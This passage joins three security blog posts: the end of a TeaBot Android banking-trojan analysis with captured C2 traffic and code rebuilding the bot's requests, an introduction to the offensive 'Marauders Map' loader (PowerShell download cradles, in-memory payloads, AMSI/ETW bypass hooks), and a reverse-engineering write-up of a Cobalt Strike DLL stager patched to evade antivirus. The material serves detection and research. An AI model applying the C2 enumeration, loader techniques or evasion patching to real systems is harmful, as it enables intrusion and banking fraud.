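import android.view.accessibility.AccessibilityManager;
import java.util.List;
import java.util.Set;

// Enumerates enabled accessibility services and flags unexpected ones that
// are capable of reading window content (i.e. acting as a keylogger).
class AccessibilityServiceCheck {

    static void check(Context context, Set<String> knownGoodServices) {
        AccessibilityManager am = (AccessibilityManager)
                context.getSystemService(Context.ACCESSIBILITY_SERVICE);
        List<AccessibilityServiceInfo> services =
                am.getEnabledAccessibilityServiceList(
                        AccessibilityServiceInfo.FEEDBACK_ALL_MASK);
        for (AccessibilityServiceInfo info : services) {
            boolean canReadScreen = (info.getCapabilities()
                    & AccessibilityServiceInfo.CAPABILITY_CAN_RETRIEVE_WINDOW_CONTENT) != 0;
            if (canReadScreen && !knownGoodServices.contains(info.getId())) {
                // info.getId() looks like "com.example.app/.MyService"
                reportSuspiciousService(info.getId());
            }
        }
    }

    static void reportSuspiciousService(String serviceId) {
        // hypothetical: report to backend as a risk signal
    }
}
```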

This information could be used to identify suspicious services running on the device. It would require building a dataset of known-good services to compare against. Given that Google is really hammering down on applications requiring accessibility services in the Google Play store, this could be a valid approach.

The obvious downside is that there will still be false positives. Additionally, there may be some privacy related issues as well, since it might not be desirable to identify disabilities in users.

Can’t Google fix this?

For a large part, dealing with these overlay attacks is Google’s responsibility, and over the last few versions, they have made multiple changes to make it more difficult to use the SYSTEM_ALERT_WINDOW (SAW) overlay permission:

  • Android Q (Go Edition) doesn’t support the SAW.
  • Sideloaded apps on Android P lose the SAW permission upon reboot.
  • Android O has marked the SAW permission deprecated, though Android 11 has removed the deprecated status.
  • Play Store apps on Android Q lose the permission on reboot.
  • Android O shows a notification for apps that are performing overlays, but also allows you to disable the notifications through settings (and thus through accessibility as well).
  • Android Q introduced the Bubbles API, which deals with some of the use cases for SAW, but not all of them.

Almost all of these updates are mitigations and don’t fix the actual problem. Only the removal of SAW in Android Q (Go Edition) is a real way to stop overlay attacks, and it may hopefully one day make it into the standard Android version as well.

Android 12 Preview

The latest version of the Android 12 preview actually contains a new permission called HIDE_OVERLAY_WINDOWS. After acquiring this permission, an app can call setHideOverlayWindows() to disable overlays. This is another step in the right direction, but it’s still far from great. Instead of targeting the application when the user opens it, the malware could still create fake notifications that link directly to the overlay without the targeted application even being opened.

It’s clear that this is not an easy problem to fix. Developers have been able to use SAW since Android 1, and many apps rely on the permission to provide their core functionality. Removing it would affect many apps and would thus get a lot of backlash. Finally, any new update that Google makes will take many years to reach a high percentage of Android users, due to Android’s slow update process and the unwillingness of mobile device manufacturers to provide major OS updates to users.

Now that we understand the permissions involved, let’s go back to the TeaBot malware.

TeaBot – Attacking Belgian apps

What was surprising about Cleafy’s original report is the targeting of Belgian applications, which so far had been spared from similar attacks. This is unexpected, since Belgian financial apps all make use of strong authentication (card readers, ItsMe, etc.) and are thus pretty hard to successfully phish. Let’s take a look at how exactly the TeaBot family attacks these applications.

Once the TeaBot malware is installed, it shows the user a small animation explaining how to enable accessibility options. It doesn’t provide a specific explanation for the accessibility service, and it doesn’t pretend to be a Google or system service. However, if you wait too long to activate the accessibility service, the device will start vibrating regularly, which is extremely annoying and will surely convince many victims to enable the service.

  • Main view when opening the app
  • Automatically opens the Accessibility Settings
  • No description of the service
  • The service requests full control
  • If you wait too long, you get annoying popups and vibration
  • After enabling the service, the application quits and shows an error message

This specific sample pretends to be bpost, but TeaBot also pretends to be the VLC Media Player, the Spanish postal app Correos, a video streaming app called Mobdro, and UPS as well.

The malware sample has the following functionality related to attacking financial applications:

  • Take a screenshot;
  • Perform overlay attacks on specific apps;
  • Enable keyloggers for specific apps.

Just like the FluBot sample from our last blogpost, the application collects all of the installed applications and then sends them to the C2 which returns a list of the applications that should be attacked:

POST /api/getbotinjects HTTP/1.1
Accept-Charset: UTF-8
Content-Type: application/xml
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Nexus 5 Build/QQ3A.200805.001)
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 776

{"installed_apps":[{"package":"org.proxydroid"},{"package":"com.android.documentsui"}, ...<snip>... ,{"package":"com.android.messaging"}]}
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 2
Date: Mon, 10 May 2021 19:20:51 GMT


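The request body above follows a simple, fixed format. As a hypothetical reconstruction (class and method names are ours; the JSON shape is taken directly from the captured traffic), it can be rebuilt like this, which is also how we generated bodies for the brute-forcing described below:

```java
import java.util.List;

// Rebuilds the installed-apps JSON body that the TeaBot sample sends to
// /api/getbotinjects, based on the captured request above.
public class BotInjectsBody {

    static String buildBody(List<String> packages) {
        StringBuilder sb = new StringBuilder("{\"installed_apps\":[");
        for (int i = 0; i < packages.size(); i++) {
            if (i > 0) sb.append(',');
            sb.append("{\"package\":\"").append(packages.get(i)).append("\"}");
        }
        return sb.append("]}").toString();
    }

    public static void main(String[] args) {
        System.out.println(buildBody(
                List.of("org.proxydroid", "com.android.messaging")));
    }
}
```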
In order to identify the applications that are attacked, we can supply a list of banking applications which will return more interesting data:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 2031830
Date: Mon, 10 May 2021 18:28:01 GMT

		"html":"<!DOCTYPE html><html lang=\"en\"><head> ...SNIP...</html>",
		"html":"<!DOCTYPE html><html lang=\"en\"><head> ...SNIP...</html>"
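The exchange above can be modeled in a few lines of Python. This is a sketch based on the captured traffic: the response shape (a JSON array of application/html pairs) is an assumption derived from the snippets above, and no real C2 is contacted.

```python
import json

# Sketch of the /api/getbotinjects exchange, based on the captured traffic.
# The response shape (a JSON array of {"application": ..., "html": ...}
# entries) is an assumption derived from the snippets above; no network
# traffic is generated here.

def build_getbotinjects_body(installed_packages):
    """Serialize the package list the way the bot does in its POST body."""
    return json.dumps({"installed_apps": [{"package": p} for p in installed_packages]})

def extract_overlay_targets(response_body):
    """Return the package names for which the C2 served overlay HTML."""
    return [e["application"] for e in json.loads(response_body) if e.get("html")]

body = build_getbotinjects_body(["org.proxydroid", "be.belfius.directmobile.android"])
# Simulated C2 answer containing one overlay (real answers are ~2 MB of HTML):
simulated = json.dumps([{"application": "be.belfius.directmobile.android",
                         "html": "<!DOCTYPE html><html lang=\"en\">...snip...</html>"}])
print(extract_overlay_targets(simulated))  # ['be.belfius.directmobile.android']
```

This also illustrates how a researcher can enumerate targets: supplying a list of candidate banking packages and keeping only those for which overlay HTML comes back.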

By brute-forcing against different C2 servers, overlays for the following apps were returned:


Only one Belgian financial application (be.belfius.directmobile.android) returned an overlay. The interesting part is that the overlay only phishes for credit card information and not for anything related to account onboarding:

The overlay requests the debit card number, but nothing else.

This overlay will be shown when TeaBot detects that the Belfius app has been opened. This way the user will expect a Belfius prompt to appear, which gives more credibility to the malicious view that was opened.

The original report by Cleafy specified at least 5 applications under attack, so we need to dig a bit deeper. Another endpoint called by the samples is /getkeyloggers. Fortunately, this one simply returns a list of targeted applications without us having to guess.

GET /api/getkeyloggers HTTP/1.1
Accept-Charset: UTF-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Nexus 5 Build/QQ3A.200805.001)
Connection: close
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 1205
Date: Tue, 11 May 2021 12:45:30 GMT

[{"application":"com.ing.banking"},{"application":"com.binance.dev"},{"application":"com.bankinter.launcher"},{"application":"com.unicredit"},{"application":"com.lynxspa.bancopopolare"}, ... ]

Scattered over multiple C2 servers, we could identify the following targeted applications:


Based on this list, 14 Belgian applications are being attacked through the keylogger module. Since all these applications have a strong device onboarding and authentication flow, the impact of the collected information should be limited.

However, if the applications don’t detect the active keylogger, the malware could still collect any information entered by the user into the app. In this regard, the impact is the same as when someone installs a malicious keyboard that logs all the entered information.

Google Play Protect will protect you

The TeaBot sample is currently not known to spread through the Google Play store. That means victims need to install it by downloading and installing the app manually. Most devices have Google Play Protect installed, which will automatically block the currently identified TeaBot samples.

Of course, this is a typical cat & mouse game between Google and malware developers, and who knows how many samples may go undetected …


It’s very interesting to see how TeaBot attacks the Belgian financial applications. While they don’t attempt to social engineer a user into a full device onboarding, the malware developers are finally identifying Belgium as an interesting target.

It will be very interesting to see how these attacks will evolve. Eventually all financial applications will have very strong authentication and then malware developers will either have to be satisfied with only stealing credit-card information, or they will have to invest into more advanced tactics with live challenge/responses and active social engineering.

From a development point of view, there’s not much we can do. The Android OS provides the functionality that is abused and it’s difficult to take that functionality away again. Collecting as much information about the device as possible can help in making correct assessments on the risk of certain transactions, but there’s no silver bullet.

Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

I Solemnly Swear I Am Up To No Good. Introducing the Marauders Map

27 April 2021 at 15:52

This blogpost will be a bit different, as it’s going to tell a bit of a story…

In this blogpost I want to achieve 2 objectives:

  • address a question I keep hearing and seeing pop up in my DMs every now and then ("how do I become a red teamer?", "how do I become a toolsmith?", "how do I learn more about internals?"), which I will do by telling about an experience that happened to me recently.
  • Introduce the Marauders Map, heavily inspired by the great work of MDSec's SharpPack.

Without further ado, let’s get into it…

Why you should think before you run.

Quite recently, one of our clients asked us to do an assessment of their environment. We got an initial foothold through an assumed-breach scenario, giving us full access on a workstation as a normal user.
This organization is pretty well secured and has been a client of ours for a few years now. It's always nice to see your clients mature as you advise them from a consultant's point of view. That being said, we wanted to try something "different" than our other approaches.

Being a bit of a toolsmith myself, I was already working on two offensive tools; as it turns out, both already existed in the open-source world, as pointed out to me by @shitsecure (Fabian Mosch) and @domchell (Dominic Chell). Dominic from MDSec pointed me to a (fairly) old blogpost on their own blog, called SharpPack: The Insider Threat Toolkit, and Fabian pointed me to a cool project from @Flangvik called NetLoader.

If you start releasing tools (or if you are a pentester/red teamer using OST (= Open Source Tooling)), you'll see a few names pop up over and over again. In general, it's a good idea for both red and blue teams to keep an eye on their work, as it is often of pretty high quality and nothing less than amazing.

Recently, I came across some discussion in the infosec community about the OSCP and how a student (initially) failed their exam because they ran linPEAS. This brings me to the following point: if you want to become better at something, you should DO IT. A stupid but accurate example that proves my point is the following: if you want to learn to drive a car, you will not learn it from watching other people drive. At some point, you'll have to take your place behind the wheel and drive for yourself, even if it can be a bit scary.

Coding, pentesting and red teaming are no different. Let me ask you this: if you run tools you did not write yourself, and you never look at the source code of said tools, how can you understand what they do, and more importantly, how are you bringing value to your client? How can you give accurate and to-the-point recommendations if you don't even know how the exploit or tool works?

Unfortunately, I see a lot of pentesters and even red teamers make this mistake. And to be perfectly honest, I have made that mistake too. I just hope this post might convince you to think twice before you "go loco" in your client's infrastructure next time.

The Marauders Map, a copy of SharpPack?

As I was already writing the tooling before I noticed SharpPack was already a thing, I had three options:

  1. Trash my project
  2. Continue my project, taking SharpPack into account
  3. Submit PRs to SharpPack

I was just on the verge of trashing my project when my friend Fabian (@shitsecure) DM'd me, noticing I had removed a tweet. He said something along the lines of "just continue the project and learn from it", and he was right. So two options remained.

My code base was already out of sync with SharpPack; for example, I was leveraging Ionic.Zip to execute binaries from encrypted zips, much like my other tool SharpZipRunner does. Submitting PRs would also mean I would have to test the project extensively to make sure my code would not end up breaking things.

For that reason, I decided to continue with the project as a separate project, and honestly, now that the project is release-ready, I'm glad I did it like this, because I learned a thing or two along the way about reflection, such as the Assembly.EntryPoint property. I gave a reflection brown bag a while ago, but as you can see, even an old dog can learn new tricks.

Introducing the Marauders Map

The Marauders Map is quite similar to SharpPack, although there are some subtle differences. As already mentioned, I'm using Ionic's zip NuGet package for all my encrypted zip shenanigans. Additionally, I added functionality to bypass ETW and AMSI (although on the open-source version of this project, you will have to bring your own) and functionality to retrieve binaries over the web.

I recommend reading the excellent work of MDSec in their blogpost, but to give you a quick rundown of what the Marauders Map (and SharpPack, by extension) does…

MaraudersMap is a DLL written completely in C# using the DllExport project, which is pretty much magic in a box. This project makes it possible to decorate any static function with the [DllExport] attribute, allowing it to serve as an entry point for unmanaged code.
Essentially, this means you can now run C# using rundll32, for example.

A much more interesting functionality however can be seen below:

The primary use case of the marauder map is to be used for internal pentests, or for leg up scenarios where you get full GUI access to a workstation or citrix environment.

Marauders map can be leveraged by the office suite to do all the juicy stuff listed below:

  • Run PowerShell commands such as whoami, or even full-fledged download cradles a la IEX(New-Object … )
  • Run PowerShell scripts from within an encrypted zip, unpacking them completely in memory
  • Run C# binaries from within an encrypted zip, unpacking them completely in memory
  • Run C# binaries fetched from the internet

All these options can be extended with ETW and AMSI bypasses, which are not included in the project by default; attempting to run as-is will result in output stating "bring your own :)".

It works on both 32-bit and 64-bit Office versions; you just have to compile for the correct architecture.

The GitHub project and its necessary documentation can be found here: https://github.com/NVISOsecurity/blogposts/tree/master/MaraudersMap


My initial thought was to get a PowerShell shell running in Office, but for some reason the AllocConsole Win32 API call is not agreeing with Office. If anyone knows how to fix this, submit a PR or give me a shout on Twitter. I had high hopes for this one. RIP PoshOffice (for now at least).


Although open-source tooling is great, you should not blindly run any tool you find on GitHub without proper vetting first. Doing so could lead to disastrous results, such as leaving a permanent backdoor open in your client's environment. Additionally, leverage existing OST to hone your own coding skills further; when possible, submit pull requests or create your own versions of existing OST. It will serve as a good learning school, teaching you more about coding but also about the internal workings of specific processes.

Last but not least….

Jean-François Maes

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the Gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course.

Anatomy of Cobalt Strike’s DLL Stager

26 April 2021 at 16:51

NVISO recently monitored a targeted campaign against one of its customers in the financial sector. The attempt was spotted at its earliest stage following an employee’s report concerning a suspicious email. While no harm was done, we commonly identify any related indicators to ensure additional monitoring of the actor.

The reported email was an application for one of the company’s public job offers and attempted to deliver a malicious document. What caught our attention, besides leveraging an actual job offer, was the presence of execution-guardrails in the malicious document. Analysis of the document uncovered the intention to persist a Cobalt Strike stager through Component Object Model Hijacking.

During my free time I enjoy analyzing samples NVISO spots in-the-wild, and hence further dissected the Cobalt Strike DLL payload. This blog post will cover the payload’s anatomy, design choices and highlight ways to reduce both log footprint and time-to-shellcode.

Execution Flow Analysis

To understand how the malicious code works we have to analyze its behavior from start to end. In this section, we will cover the following flows:

  1. The initial execution through DllMain.
  2. The sending of encrypted shellcode into a named pipe by WriteBufferToPipe.
  3. The pipe reading, shellcode decryption and execution through PipeDecryptExec.

As previously mentioned, the malicious document’s DLL payload was intended to be used as a COM in-process server. With this knowledge, we can already expect some known entry points to be exposed by the DLL.

List of available entry points as displayed in IDA.

While technically the malicious execution can occur in any of the 8 functions, malicious code commonly resides in the DllMain function given that, besides TLS callbacks, it is the function most likely to execute.

DllMain: An optional entry point into a dynamic-link library (DLL). When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process. The system also calls the entry-point function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions.


Throughout the following analysis functions and variables have been renamed to reflect their usage and improve clarity.

The DllMain Entry Point

As can be seen in the following capture, the DllMain function simply executes another function by creating a new thread. This threaded function we named DllMainThread is executed without any additional arguments being provided to it.

Graphed disassembly of DllMain.

Analyzing the DllMainThread function uncovers it is an additional wrapper towards what we will discover is the malicious payload’s decryption and execution function (called DecryptBufferAndExec in the capture).

Disassembly of DllMainThread.

By going one level deeper, we can see the start of the malicious logic. Analysts experienced with Cobalt Strike will recognize the well-known MSSE-%d-server pattern.

Disassembly of DecryptBufferAndExec.

A couple of things occur in the above code:

  1. The sample starts by retrieving the tick count through GetTickCount and then divides it by 0x26AA. While obtaining a tick count usually serves as a time measurement, here the divided tick is solely used as a pseudo-random number.
  2. The sample then proceeds to call a wrapper around an implementation of the sprintf function. Its role is to format a string into the PipeName buffer. As can be observed, the formatted string will be \\.\pipe\MSSE-%d-server where %d will be the result computed in the previous division (e.g.: \\.\pipe\MSSE-1234-server). This pipe’s format is a well-documented Cobalt Strike indicator of compromise.
  3. With the pipe’s name defined in a global variable, the malicious code creates a new thread to run WriteBufferToPipeThread. This function will be the next one we will analyze.
  4. Finally, while the new thread is running, the code jumps to the PipeDecryptExec routine.
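Steps 1 and 2 boil down to a handful of instructions. A Python model of the pipe-name derivation (illustrative only; the real sample does this with GetTickCount and an sprintf implementation) could look like this:

```python
# Model of the pipe-name derivation: the tick count is divided by 0x26AA
# and the quotient is formatted into the well-known MSSE-%d-server pattern.
def msse_pipe_name(tick_count: int) -> str:
    return "\\\\.\\pipe\\MSSE-%d-server" % (tick_count // 0x26AA)

# 0x26AA == 9898; with an uptime of exactly 9898 * 1234 milliseconds:
print(msse_pipe_name(9898 * 1234))  # \\.\pipe\MSSE-1234-server
```

For defenders, this also shows why the pattern is trivial to hunt for: any pipe matching MSSE-<number>-server is a strong Cobalt Strike indicator.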

So far, we had a linear execution from our DllMain entry point until the DecryptBufferAndExec function. We could graph the flow as follows:

Execution flow from DllMain until DecryptBufferAndExec.

As we can see, two threads are now going to run concurrently. Let’s focus ourselves on the one writing into the pipe (WriteBufferToPipeThread) followed by its reading counterpart (PipeDecryptExec) afterwards.

The WriteBufferToPipe Thread

The thread writing into the generated pipe is launched from DecryptBufferAndExec without any additional arguments. By entering into the WriteBufferToPipeThread function, we can observe it is a simple wrapper to WriteBufferToPipe except it furthermore passes the following arguments recovered from a global Payload variable (pointed to by the pPayload pointer):

  1. The size of the shellcode, stored at offset 0x4.
  2. A pointer to a buffer containing the encrypted shellcode, stored at offset 0x14.
Disassembly of WriteBufferToPipeThread.

Within the WriteBufferToPipe function we can notice the code starts by creating a new pipe. The pipe’s name is recovered from the PipeName global variable which, if you remember, was previously populated by the sprintf function. The code creates a single instance, outbound pipe (PIPE_ACCESS_OUTBOUND) by calling CreateNamedPipeA and then connects to it using the ConnectNamedPipe call.

Graphed disassembly of WriteBufferToPipe‘s named pipe creation.

If the connection was successful, the WriteBufferToPipe function proceeds to loop the WriteFile call as long as there are bytes of the shellcode to be written into the pipe.

Graphed disassembly of WriteBufferToPipe writing to the pipe.

One important detail worth noting is that once the shellcode is written into the pipe, the previously opened handle to the pipe is closed through CloseHandle. This indicates that the pipe’s sole purpose was to transfer the encrypted shellcode.

Once the WriteBufferToPipe function is completed, the thread terminates. Overall the execution flow was quite simple and can be graphed as follows:

Execution flow from WriteBufferToPipe.

The PipeDecryptExec Flow

As a quick refresher, the PipeDecryptExec flow was executed immediately after the creation of the WriteBufferToPipe thread. The first task performed by PipeDecryptExec is to allocate a memory region to receive shellcode to be transmitted through the named pipe. To do so, a call to malloc is performed with as argument the shellcode size stored at offset 0x4 of the global Payload variable.

Once the buffer allocation is completed, the code sleeps for 1024 milliseconds (0x400) and calls FillBufferFromPipe with both the buffer location and buffer size as arguments. Should the FillBufferFromPipe call fail by returning FALSE (0), the code loops back to the Sleep call and attempts the operation again until it succeeds. These Sleep calls and loops are required as the multi-threaded sample has to wait for the shellcode to be written into the pipe.

Once the shellcode is written to the allocated buffer, PipeDecryptExec will finally launch the decryption and execution through XorDecodeAndCreateThread.

Graphed disassembly of PipeDecryptExec.

To transfer the encrypted shellcode from the pipe into the allocated buffer, FillBufferFromPipe opens the pipe in read-only mode (GENERIC_READ) using CreateFileA. As was done for the pipe’s creation, the name is retrieved from the global PipeName variable. If accessing the pipe fails, the function proceeds to return FALSE (0), resulting in the above described Sleep and retry loop.

Disassembly of FillBufferFromPipe‘s pipe access.

Once the pipe is opened in read-only mode, the FillBufferFromPipe function proceeds to copy over the shellcode using ReadFile until the allocated buffer is filled. Once the buffer is filled, the handle to the named pipe is closed through CloseHandle and FillBufferFromPipe returns TRUE (1).

Graphed disassembly of FillBufferFromPipe copying data.

Once FillBufferFromPipe has successfully completed, the named pipe has completed its task and the encrypted shellcode has been moved from one memory region to another.
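The WriteBufferToPipe/FillBufferFromPipe pair can be modeled with an anonymous pipe and two threads in Python. This is a portable sketch (the sample uses a Windows named pipe, not os.pipe), but it makes the point concrete: the pipe is functionally nothing more than an expensive memcpy.

```python
import os
import threading

# Portable model of WriteBufferToPipe / FillBufferFromPipe: one thread writes
# the (still encrypted) shellcode into a pipe, the main flow reads it back
# into a fresh buffer. The sample uses a Windows named pipe; an anonymous
# os.pipe() keeps this sketch cross-platform.
encrypted_shellcode = bytes(range(256)) * 4  # stand-in for the real payload

def write_buffer_to_pipe(fd: int, payload: bytes) -> None:
    os.write(fd, payload)  # the sample loops WriteFile until all bytes are sent
    os.close(fd)           # handle closed once the transfer is done

def fill_buffer_from_pipe(fd: int, size: int) -> bytes:
    chunks, remaining = [], size
    while remaining:       # the sample loops ReadFile until the buffer is full
        chunk = os.read(fd, remaining)
        if not chunk:
            break
        chunks.append(chunk)
        remaining -= len(chunk)
    os.close(fd)
    return b"".join(chunks)

r, w = os.pipe()
writer = threading.Thread(target=write_buffer_to_pipe, args=(w, encrypted_shellcode))
writer.start()
copied = fill_buffer_from_pipe(r, len(encrypted_shellcode))
writer.join()
assert copied == encrypted_shellcode  # same bytes, different memory region
```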

Back in the caller PipeDecryptExec function, once the FillBufferFromPipe call returns TRUE the XorDecodeAndCreateThread function gets called with the following parameters:

  1. The buffer containing the copied shellcode.
  2. The length of the shellcode, stored at the global Payload variable’s offset 0x4.
  3. The symmetric XOR decryption key, stored at the global Payload variable’s offset 0x8.

Once invoked, the XorDecodeAndCreateThread function starts by allocating yet another memory region using VirtualAlloc. The allocated region has read/write permissions (PAGE_READWRITE) but is not executable. By not making a region writable and executable at the same time, the sample possibly attempts to evade security solutions which only look for PAGE_EXECUTE_READWRITE regions.

Once the region is allocated, the function loops over the shellcode buffer and decrypts each byte using a simple XOR operation into the newly allocated region.
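The decryption loop amounts to a byte-wise XOR against the recovered key. A minimal Python equivalent (the key and ciphertext below are made up for illustration; the real key sits at offset 0x8 of the Payload structure):

```python
from itertools import cycle

# Byte-wise XOR decode, equivalent to the sample's decryption loop.
# Key and ciphertext are made up; the real key comes from offset 0x8
# of the global Payload structure.
def xor_decode(encrypted: bytes, key: bytes) -> bytes:
    return bytes(c ^ k for c, k in zip(encrypted, cycle(key)))

# XOR is symmetric: encoding and decoding are the same operation.
ciphertext = xor_decode(b"MZ\x90\x00", b"\x2e")
assert xor_decode(ciphertext, b"\x2e") == b"MZ\x90\x00"
```

This symmetry is what makes recovering the shellcode from a memory dump straightforward once the key is known.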

Graphed disassembly of XorDecodeAndCreateThread.

When the decryption is complete, the GetModuleHandleAndGetProcAddressToArg function is called. Its role is to place pointers to two valuable functions into memory: GetModuleHandleA and GetProcAddress. These functions should enable the shellcode to further resolve additional procedures without relying on them being imported. Before storing these pointers, the GetModuleHandleAndGetProcAddressToArg function first ensures a specific value is not FALSE (0). Surprisingly enough, this value stored in a global variable (here called zero) is always FALSE, resulting in the pointers never being stored.

Graphed disassembly of GetModuleHandleAndGetProcAddressToArg.

Back in the caller function, XorDecodeAndCreateThread changes the shellcode’s memory region to be executable (PAGE_EXECUTE_READ) using VirtualProtect and finally creates a new thread. This final thread starts at the JumpToParameter function which acts as a simple wrapper to the shellcode, provided as argument.

Disassembly of JumpToParameter.

From here, the previously encrypted Cobalt Strike shellcode stager executes to resolve WinINet procedures, download the final beacon and execute it. We will not cover the shellcode’s analysis in this post as it would deserve a post of its own.

While this last flow contained more branches and logic, the overall graph remains quite simple:

Execution flow from PipeDecryptExec until the shellcode.

Memory Flow Analysis

What was the most surprising throughout the above analysis was the presence of a well-known named pipe. Pipes can be used as a defense evasion mechanism by decrypting the shellcode at pipe exit or for inter-process communications; but in our case it merely acted as a memcpy to move encrypted shellcode from the DLL into another buffer.

Memory flow from encrypted shellcode until decryption.

So why would this overhead be implemented? As pointed out by another colleague, the answer lays in the Artifact Kit, a Cobalt Strike dependency:

Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. […] One of the techniques [see: src-common/bypass-pipe.c in the Artifact Kit] generates executables and DLLs that serve shellcode to themselves over a named pipe. If an anti-virus sandbox does not emulate named pipes, it will not find the known bad shellcode.


As we can see in the above diagram, the staging of the encrypted shellcode in the malloc buffer generates a lot of overhead supposedly for evasion. These operations could be avoided should XorDecodeAndCreateThread instead directly read from the initial encrypted shellcode as outlined in the next diagram. Avoiding the usage of named pipes will furthermore remove the need for looped Sleep calls as the data would be readily available.

Improved memory flow from encrypted shellcode until decryption.

It seems we found a way to reduce the time-to-shellcode; but do popular anti-virus solutions actually get tricked by the named pipe?

Patching the Execution Flow

To test that theory, let’s improve the malicious execution flow. For starters we could skip the useless pipe-related calls and have the DllMainThread function call PipeDecryptExec directly, bypassing pipe creation and writing. How the assembly-level patching is performed is beyond this blog post’s scope as we are just interested in the flow’s abstraction.

Disassembly of the patched DllMainThread.

The PipeDecryptExec function will also require patching to skip malloc allocation, pipe reading and ensure it provides XorDecodeAndCreateThread with the DLL’s encrypted shellcode instead of the now-nonexistent duplicated region.

Disassembly of the patched PipeDecryptExec.

With our execution flow patched, we can furthermore zero-out any unused instructions should these be used by security solutions as a detection base.

When the patches are applied, we end up with a linear and shorter path until shellcode execution. The following graph focuses on this patched path and does not include the leaves beneath WriteBufferToPipeThread.

Outline of the patched (red) execution flow and functions.

As we also figured out how the shellcode is encrypted (we have the xor key), we modified both samples to redact the actual C2 as it can be used to identify our targeted customer.

To ensure the shellcode did not rely on any bypassed calls, we spun up a quick Python HTTPS server and made sure the redacted domain resolved to our local machine. We could then invoke both the original and patched DLL through rundll32.exe and observe how the shellcode still attempts to retrieve the Cobalt Strike beacon, proving our patches did not affect the shellcode. The exported StartW function we invoke is a simple wrapper around the Sleep call.

Capture of both the original and patched DLL attempting to fetch the Cobalt Strike beacon.

Anti-Virus Review

So do named pipes actually work as a defense evasion mechanism? While there are efficient ways to measure our patches’ impact (e.g.: comparing across multiple sandbox solutions), VirusTotal does offer a quick primary assessment. As such, we submitted the following versions with redacted C2 to VirusTotal:

  • wpdshext.dll.custom.vir which is the redacted Cobalt Strike DLL.
  • wpdshext.dll.custom.patched.vir which is our patched and redacted Cobalt Strike DLL without named pipes.

As the original Cobalt Strike contains identifiable patterns (the named pipe), we would expect the patched version to have a lower detection ratio, although the Artifact Kit would disagree.

Capture of the original Cobalt Strike’s detection ratio on VirusTotal.
Capture of the patched Cobalt Strike’s detection ratio on VirusTotal.

As we expected, the named-pipe overhead leveraged by Cobalt Strike actually turned out to act as a detection base. As can be seen in the above captures, while the original version (left) obtained only 17 detections, the patched version (right) obtained one less for a total of 16 detections. Among the thrown-off solutions we noticed ESET and Sophos did not manage to detect the pipe-less version, whereas ZoneAlarm couldn’t identify the original version.

One notable observation is that an intermediary patch where the flow is adapted but unused code is not zeroed-out turned out to be the most detected version with a total of 20 hits. This higher detection rate occurs as this patch allows pipe-unaware anti-virus vendors to also locate the shellcode while pipe-related operation signatures are still applicable.

Capture of the intermediary patched Cobalt Strike’s detection ratio on VirusTotal.

While these tests focused on the default Cobalt Strike behavior against the absence of named pipes, one might argue that a customized named pipe pattern would have had the best results. Although we did not think of this variant during the initial tests, we submitted a version with altered pipe names (NVISO-RULES-%d instead of MSSE-%d-server) the day after and obtained 18 detections. As a comparison, our two other samples had their detection rate increase to 30+ over night. We however have to consider the possibility that these 18 detections are influenced by the initial shellcode being burned.


Reversing the malicious Cobalt Strike DLL turned out to be more interesting than expected. Overall, we noticed the presence of noisy operations whose usage wasn't a functional requirement and which even turned out to act as a detection base. To confirm our hypothesis, we patched the execution flow and observed how our simplified version still reaches out to the C2 server with a lowered (almost unaltered) detection rate.

So why does it matter?

The Blue

First and foremost, this payload analysis highlights a common Cobalt Strike DLL pattern allowing us to further fine-tune detection rules. While this stager was the first DLL analyzed, we did take a look at other Cobalt Strike formats such as default beacons and those leveraging a malleable C2, both as Dynamic Link Libraries and Portable Executables. Surprisingly enough, all formats shared this commonly documented MSSE-%d-server pipe name and a quick search for open-source detection rules showed how little it is being hunted for.

The Red

Besides being helpful for NVISO’s defensive operations, this research further comforts our offensive team in their choice of leveraging custom-built delivery mechanisms; even more so following the design choices we documented. The usage of named pipes in operations targeting mature environments is more likely to raise red flags and so far does not seem to provide any evasive advantage without alteration in the generation pattern at least.

To the next actor targeting our customers: I am looking forward to modifying your samples and testing the effectiveness of altered pipe names.

Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified intrusion analyst in NVISO’s Managed Detection & Response team. He spends most of his time investigating incidents and improving detection capabilities. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.